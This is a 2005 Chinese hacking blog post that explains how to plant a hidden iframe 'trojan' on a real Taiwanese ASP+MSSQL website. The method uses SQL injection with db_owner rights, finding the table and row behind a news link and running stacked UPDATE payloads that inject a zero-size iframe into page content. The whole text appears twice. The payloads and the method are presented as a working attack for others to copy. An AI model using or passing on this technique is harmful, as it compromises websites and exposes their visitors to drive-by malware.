2005-12-07 17:20:06 by: h4x0r
具有DB_OWNER权限的,Web和数据库不在一个服务器插马小试
其实只要是asp+mssql,更新的内容都是从数据库里调用(费话),呵呵,那就可以随便找了,只要你有耐心。
拿一个台湾的网站做例子吧
这个是首页显示的更新报,其中,"密切鎖定飛碟電台 讓你搶先接收「鬼訊號」... "可以从activity_show.asp?no=69里打开此连接,那么从这里可以大略知道此no号为69,其中no不一定在那个表里的字段值为no,还得需要另从判断。
呵呵,首先肯定是要找个注入点,这里就不说了,通过nbsi2或者别的注入工具,可以轻松得到表名还有列名,很幸运,从一个表里的列值,得到"盞ち玛﹚盒筿 琵穖钡Μ碍癟腹..."这个乱码,保存为html,打开用繁体中文打开,就知道是上述所说的"「鬼訊號」... "中文,而且有一个no值为69正好是他,比较幸运..这里的表中的no字段名,不一定是"activity_show.asp?no=69"中的no名,可以是别的字段名,如mo,在asp中定义的时候,都是用request提值.比如mo=request("no")。
这样,具有db_owner权限的注点,随便找的一个文字连接就可以用update挂马了。
比如我里可以用;update TBL_ACTIVITY set HEAD='盞ち玛﹚盒筿 琵穖钡Μ碍癟腹...<iframe src="" width=0 height=0></iframe>' where NO=69
来替换他
这里对长度有限制,所以会显示出来一些代码
不过可以直接用;update TBL_ACTIVITY set HEAD='<iframe src="" width=0 height=0></iframe>' where NO=69
来替换他,这样那部分显示的就是空白,查看源文件,就用了<iframe>等代码,这样就实现了挂马的目的。
提供的还是一个思路,请高手赐教.... :)
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=302
拿一个台湾的网站做例子吧
这个是首页显示的更新报,其中,"密切鎖定飛碟電台 讓你搶先接收「鬼訊號」... "可以从activity_show.asp?no=69里打开此连接,那么从这里可以大略知道此no号为69,其中no不一定在那个表里的字段值为no,还得需要另从判断。
呵呵,首先肯定是要找个注入点,这里就不说了,通过nbsi2或者别的注入工具,可以轻松得到表名还有列名,很幸运,从一个表里的列值,得到"盞ち玛﹚盒筿 琵穖钡Μ碍癟腹..."这个乱码,保存为html,打开用繁体中文打开,就知道是上述所说的"「鬼訊號」... "中文,而且有一个no值为69正好是他,比较幸运..这里的表中的no字段名,不一定是"activity_show.asp?no=69"中的no名,可以是别的字段名,如mo,在asp中定义的时候,都是用request提值.比如mo=request("no")。
这样,具有db_owner权限的注点,随便找的一个文字连接就可以用update挂马了。
比如我里可以用;update TBL_ACTIVITY set HEAD='盞ち玛﹚盒筿 琵穖钡Μ碍癟腹...<iframe src="" width=0 height=0></iframe>' where NO=69
来替换他
这里对长度有限制,所以会显示出来一些代码
不过可以直接用;update TBL_ACTIVITY set HEAD='<iframe src="" width=0 height=0></iframe>' where NO=69
来替换他,这样那部分显示的就是空白,查看源文件,就用了<iframe>等代码,这样就实现了挂马的目的。
提供的还是一个思路,请高手赐教.... :)
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=302
There is no comment on this article.
